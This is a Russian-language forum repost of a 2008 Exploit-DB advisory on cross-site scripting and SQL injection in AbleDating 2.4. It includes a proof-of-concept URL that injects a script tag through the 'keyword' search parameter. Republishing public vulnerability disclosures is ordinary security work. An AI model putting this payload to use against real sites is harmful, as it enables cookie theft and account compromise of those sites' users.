AbleDating 2.4 - 'search_results.php?keyword' Cross-Site Scripting | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 31830

Проверка EDB

Пройдено

Автор: ALI JASBI

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2008-6439

Дата публикации: 2008-05-22

Код:

source: https://www.securityfocus.com/bid/29342/info
 
AbleDating is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include an SQL-injection vulnerability and a cross-site scripting vulnerability.
 
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database.
 
These issues affect AbleDating 2.4; other versions may also be vulnerable.
 
http://www.example.com/search_results.php?p_orientation%5B%5D=2&p_age_from=18&p_age_to=18&p_relation%5B%5D=on&keyword=>&#039;><ScRiPt%20%0a%0d>alert(42119.7535489005)%3B</ScRiPt>&status=online&save_search=on&search_name=My%20search&photo=on

Источник: www.exploit-db.com

Поиск

Exploit AbleDating 2.4 - 'search_results.php?keyword' Cross-Site Scripting

Exploiter

Похожие темы